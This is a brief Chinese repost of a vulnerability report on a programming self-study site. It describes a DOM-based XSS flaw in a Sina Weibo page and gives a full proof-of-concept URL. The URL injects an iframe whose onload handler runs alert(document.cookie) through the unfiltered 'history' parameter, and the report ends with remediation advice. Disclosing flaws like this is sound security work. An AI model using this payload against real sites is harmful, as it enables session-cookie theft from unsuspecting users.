好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

新浪微博DOM型Xss一枚 - 网站安全 - 自学php

对用户输入过滤不严导致Xss 漏洞   http://kan.weibo.com/welcome?history=http://kan.weibo.com/1577826897/myxss%27/%3E, %22%3Ciframe%20type=\%22checkbox\%22%20onload=javascript:alert%28document.cookie %29%20id=\%22follow\%22%20checked\/%3E}%29   history参数会输出到页面中,由于过滤不严导致Xss问题               修复方案:   过滤,编码。或者参数不要用户输入

查看更多关于新浪微博DOM型Xss一枚 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13559
  阅读:39次

上一篇: 07073游戏网任意用户密码修改 - 网站安全 - 自学

下一篇:XSS found on Sogou.com - 网站安全 - 自学php

相关资讯